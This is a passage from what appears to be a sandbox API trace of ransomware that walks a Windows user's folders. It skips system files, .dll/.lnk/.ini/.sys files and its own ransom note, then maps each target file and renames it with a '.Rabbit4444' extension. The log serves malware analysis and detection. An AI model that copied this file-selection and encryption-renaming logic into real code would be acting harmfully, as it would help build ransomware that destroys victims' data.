lpString2="Rabbit4444.exe") returned -1 [0070.845] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.845] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.845] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf38cf2ae, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf38cf2ae, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf38cf2ae, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.846] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.846] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.846] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ef72bf7, ftCreationTime.dwHighDateTime=0x1d327c3, ftLastAccessTime.dwLowDateTime=0x7ef72bf7, ftLastAccessTime.dwHighDateTime=0x1d327c3, ftLastWriteTime.dwLowDateTime=0x7efbf1f1, ftLastWriteTime.dwHighDateTime=0x1d327c3, nFileSizeHigh=0x0, nFileSizeLow=0x5bec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1504779872", cAlternateFileName="150477~2")) returned 1 [0070.846] lstrcmpiW (lpString1="1504779872", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.846] lstrcmpiW (lpString1="1504779872", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.846] lstrcmpiW (lpString1="1504779872", lpString2="Rabbit4444.exe") returned -1 [0070.846] lstrcmpiW (lpString1="1504779872", lpString2=".") returned 1 [0070.846] lstrcmpiW (lpString1="1504779872", lpString2="..") returned 1 [0070.846] lstrcmpiW (lpString1="1504779872", lpString2="windows") returned -1 [0070.846] lstrcmpiW (lpString1="1504779872", lpString2="bootmgr") returned -1 [0070.846] lstrcmpiW (lpString1="1504779872", lpString2="pagefile.sys") returned -1 [0070.846] lstrcmpiW (lpString1="1504779872", lpString2="boot") returned -1 [0070.846] lstrcmpiW (lpString1="1504779872", lpString2="ids.txt") returned -1 [0070.846] lstrcmpiW (lpString1="1504779872", lpString2="NTUSER.DAT") returned -1 [0070.846] lstrcpyW (in: lpString1=0x130ec56, lpString2="1504779872" | out: lpString1="1504779872") returned="1504779872" [0070.846] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815\\1504779872", dwFileAttributes=0x0) returned 1 [0070.858] lstrlenW (lpString="1504779872") returned 10 [0070.858] lstrlenW (lpString="Rabbit4444") returned 10 [0070.858] lstrcmpiW (lpString1="1504779872", lpString2="Rabbit4444") returned -1 [0070.858] lstrlenW (lpString=".dll") returned 4 [0070.858] lstrcmpiW (lpString1="9872", lpString2=".dll") returned 1 [0070.858] lstrlenW (lpString=".lnk") returned 4 [0070.858] lstrcmpiW (lpString1="9872", lpString2=".lnk") returned 1 [0070.858] lstrlenW (lpString=".ini") returned 4 [0070.858] lstrcmpiW (lpString1="9872", lpString2=".ini") returned 1 [0070.858] lstrlenW (lpString=".sys") returned 4 [0070.858] lstrcmpiW (lpString1="9872", lpString2=".sys") returned 1 [0070.858] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815\\1504779872" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280815\\1504779872"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0070.859] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.859] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16216944821) returned 1 [0070.859] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=23532) returned 1 [0070.859] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0070.859] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101628 [0070.859] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5ef0, lpName=0x0) returned 0x27c [0070.860] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5ef0) returned 0x70000 [0070.863] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x104d38 [0070.863] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0070.863] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104d38 | out: hHeap=0xe0000) returned 1 [0070.863] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0070.863] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x104d38 [0070.863] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0070.863] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104d38 | out: hHeap=0xe0000) returned 1 [0070.863] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0070.863] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16217415732) returned 1 [0070.863] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0070.863] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101628 | out: hHeap=0xe0000) returned 1 [0070.864] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.864] CloseHandle (hObject=0x27c) returned 1 [0070.864] CloseHandle (hObject=0x260) returned 1 [0070.864] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815\\1504779872.Rabbit4444") returned 164 [0070.864] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815\\1504779872" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280815\\1504779872"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815\\1504779872.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280815\\1504779872.rabbit4444"), dwFlags=0x1) returned 1 [0070.865] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7730335, ftCreationTime.dwHighDateTime=0x1d336d8, ftLastAccessTime.dwLowDateTime=0xa7730335, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xa77a2b7b, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x5bba, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1506438227", cAlternateFileName="150643~2")) returned 1 [0070.865] lstrcmpiW (lpString1="1506438227", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.865] lstrcmpiW (lpString1="1506438227", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.865] lstrcmpiW (lpString1="1506438227", lpString2="Rabbit4444.exe") returned -1 [0070.865] lstrcmpiW (lpString1="1506438227", lpString2=".") returned 1 [0070.865] lstrcmpiW (lpString1="1506438227", lpString2="..") returned 1 [0070.865] lstrcmpiW (lpString1="1506438227", lpString2="windows") returned -1 [0070.865] lstrcmpiW (lpString1="1506438227", lpString2="bootmgr") returned -1 [0070.865] lstrcmpiW (lpString1="1506438227", lpString2="pagefile.sys") returned -1 [0070.865] lstrcmpiW (lpString1="1506438227", lpString2="boot") returned -1 [0070.865] lstrcmpiW (lpString1="1506438227", lpString2="ids.txt") returned -1 [0070.865] lstrcmpiW (lpString1="1506438227", lpString2="NTUSER.DAT") returned -1 [0070.865] lstrcpyW (in: lpString1=0x130ec56, lpString2="1506438227" | out: lpString1="1506438227") returned="1506438227" [0070.865] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815\\1506438227", dwFileAttributes=0x0) returned 1 [0070.866] lstrlenW (lpString="1506438227") returned 10 [0070.866] lstrlenW (lpString="Rabbit4444") returned 10 [0070.866] lstrcmpiW (lpString1="1506438227", lpString2="Rabbit4444") returned -1 [0070.866] lstrlenW (lpString=".dll") returned 4 [0070.866] lstrcmpiW (lpString1="8227", lpString2=".dll") returned 1 [0070.866] lstrlenW (lpString=".lnk") returned 4 [0070.867] lstrcmpiW (lpString1="8227", lpString2=".lnk") returned 1 [0070.867] lstrlenW (lpString=".ini") returned 4 [0070.867] lstrcmpiW (lpString1="8227", lpString2=".ini") returned 1 [0070.867] lstrlenW (lpString=".sys") returned 4 [0070.867] lstrcmpiW (lpString1="8227", lpString2=".sys") returned 1 [0070.867] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815\\1506438227" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280815\\1506438227"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0070.867] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.867] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16217783941) returned 1 [0070.867] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=23482) returned 1 [0070.867] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0070.867] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0070.867] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5ec0, lpName=0x0) returned 0x27c [0070.868] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5ec0) returned 0x70000 [0070.870] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x104d38 [0070.870] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0070.870] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104d38 | out: hHeap=0xe0000) returned 1 [0070.870] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0070.870] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x104d38 [0070.870] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0070.870] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104d38 | out: hHeap=0xe0000) returned 1 [0070.870] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0070.870] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16218103279) returned 1 [0070.870] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0070.870] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0070.870] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.871] CloseHandle (hObject=0x27c) returned 1 [0070.871] CloseHandle (hObject=0x260) returned 1 [0070.871] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815\\1506438227.Rabbit4444") returned 164 [0070.871] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815\\1506438227" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280815\\1506438227"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815\\1506438227.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280815\\1506438227.rabbit4444"), dwFlags=0x1) returned 1 [0070.872] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c362eb, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x3c4f3536, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb7fe6fe6, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0070.872] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.872] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.872] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0070.872] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".") returned 1 [0070.872] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="..") returned 1 [0070.872] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="windows") returned -1 [0070.872] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="bootmgr") returned 1 [0070.872] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="pagefile.sys") returned -1 [0070.872] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="boot") returned 1 [0070.872] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="ids.txt") returned -1 [0070.872] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0070.872] lstrcpyW (in: lpString1=0x130ec56, lpString2="eventbeacons.dat" | out: lpString1="eventbeacons.dat") returned="eventbeacons.dat" [0070.872] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815\\eventbeacons.dat", dwFileAttributes=0x0) returned 1 [0070.872] lstrlenW (lpString="eventbeacons.dat") returned 16 [0070.872] lstrlenW (lpString="Rabbit4444") returned 10 [0070.872] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0070.872] lstrlenW (lpString=".dll") returned 4 [0070.872] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0070.872] lstrlenW (lpString=".lnk") returned 4 [0070.872] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0070.872] lstrlenW (lpString=".ini") returned 4 [0070.872] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0070.872] lstrlenW (lpString=".sys") returned 4 [0070.872] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0070.872] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c362eb, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x3c362eb, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xb7fe6fe6, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0070.872] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.873] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.873] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0070.873] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".") returned 1 [0070.873] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="..") returned 1 [0070.873] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="windows") returned -1 [0070.873] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="bootmgr") returned 1 [0070.873] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="pagefile.sys") returned -1 [0070.873] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="boot") returned 1 [0070.873] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="ids.txt") returned 1 [0070.873] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0070.873] lstrcpyW (in: lpString1=0x130ec56, lpString2="imprbeacons.dat" | out: lpString1="imprbeacons.dat") returned="imprbeacons.dat" [0070.873] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815\\imprbeacons.dat", dwFileAttributes=0x0) returned 1 [0070.873] lstrlenW (lpString="imprbeacons.dat") returned 15 [0070.873] lstrlenW (lpString="Rabbit4444") returned 10 [0070.873] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0070.873] lstrlenW (lpString=".dll") returned 4 [0070.873] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0070.873] lstrlenW (lpString=".lnk") returned 4 [0070.873] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0070.873] lstrlenW (lpString=".ini") returned 4 [0070.873] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0070.873] lstrlenW (lpString=".sys") returned 4 [0070.873] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0070.873] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c362eb, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x3c362eb, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xb7fe6fe6, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0070.873] FindClose (in: hFindFile=0x1026d0 | out: hFindFile=0x1026d0) returned 1 [0070.874] lstrcpyW (in: lpString1=0x130ec56, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.874] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280815\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0070.874] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0070.874] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.875] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.876] CloseHandle (hObject=0x260) returned 1 [0070.876] CloseHandle (hObject=0x228) returned 1 [0070.876] GetCurrentThreadId () returned 0xd98 [0070.876] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122288 [0070.876] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813" [0070.876] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104c10 | out: hHeap=0xe0000) returned 1 [0070.876] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122280 | out: hHeap=0xe0000) returned 1 [0070.876] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813" [0070.876] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813\\" [0070.876] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813\\.BFC0E91B00AE8A0620D3" [0070.876] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280813\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0070.879] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.882] FlushFileBuffers (hFile=0x228) returned 1 [0070.882] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.883] CloseHandle (hObject=0x228) returned 1 [0070.883] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813") returned 142 [0070.883] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.883] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280813\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3be9e93, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x35a99a0d, ftLastAccessTime.dwHighDateTime=0x1d327c2, ftLastWriteTime.dwLowDateTime=0xf391b673, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1026d0 [0070.883] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.883] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.883] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.883] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.883] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3be9e93, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x35a99a0d, ftLastAccessTime.dwHighDateTime=0x1d327c2, ftLastWriteTime.dwLowDateTime=0xf391b673, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.883] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.883] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.883] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0070.883] lstrcmpiW 